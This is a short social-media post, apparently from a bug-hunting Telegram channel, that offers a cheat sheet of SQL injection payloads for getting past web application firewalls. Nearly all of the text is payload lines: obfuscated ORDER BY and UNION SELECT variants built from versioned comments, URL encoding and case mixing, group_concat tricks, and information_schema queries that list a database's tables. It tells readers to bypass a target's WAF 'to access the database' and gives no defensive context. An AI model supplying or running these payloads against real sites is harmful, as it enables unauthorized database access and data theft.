SQL Injection Bypass
—————————
if your target have waf you should bypass that to access the database.
Lets start 🥷🏽
#sqli #sql_injection
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3
—————————
if your target have waf you should bypass that to access the database.
Lets start 🥷🏽
ORDER BY —>
/*!50000Order*/by
/*!50000order*//*!50000by*/
/*!50000OrdeR*/By
/*!50000ORDER*//*!50000BY*/
/**A**/Order by
Order/**A**/By
/**/**/ORDER/**/BY/**/**/
Null' order by
O0x72der b0x7920
Union —>
/*!50000union select
/*!50000Union*//*!50000Select*/
/*!12345union*//*!12345select*/
/**A**/union select
union /**A**/ select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
%23%0AUnion%23aaaaaaaaaa%0ASelect%23%0A1
+?UnI?On?+'SeL?ECT?
group_concat —>
group_concat(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
unhex(hex(group_concat(table_name)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
from table_name —>
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!50000frOm*/+/*!50000information_schema*/%252e/**/columns
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
#sqli #sql_injection
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3
❤6❤🔥2👍1